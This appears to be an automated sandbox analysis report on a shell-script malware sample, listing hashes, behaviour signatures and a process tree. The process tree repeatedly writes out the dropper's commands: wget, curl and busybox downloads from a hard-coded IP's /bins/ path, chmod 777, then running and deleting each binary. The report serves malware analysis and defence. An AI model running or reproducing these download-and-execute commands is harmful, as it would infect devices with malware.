Analysis
-
max time kernel
96s -
max time network
99s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 871 chmod 877 chmod 901 chmod 895 chmod 919 chmod 859 chmod 883 chmod 889 chmod 931 chmod 955 chmod 961 chmod 840 chmod 907 chmod 913 chmod 737 chmod 802 chmod 808 chmod 817 chmod 937 chmod 949 chmod 967 chmod 745 chmod 751 chmod 865 chmod 925 chmod 943 chmod 973 chmod 979 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 738 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 746 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 752 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 803 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 809 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 819 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 841 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 860 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 866 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 872 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 878 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 884 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 890 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 896 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 902 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 908 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 914 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 920 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 926 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 932 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 938 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 944 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 950 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 956 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 962 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 968 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 974 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 980 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 910 wget 915 rm 886 wget 891 rm 890 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 911 curl 912 busybox 914 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 887 curl 888 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:733
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:744
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:750
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:800
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:807
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:816
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:836
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:858
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:864
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:870
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:876
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:882
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:894
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:900
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:906
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:918
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:924
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:930
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
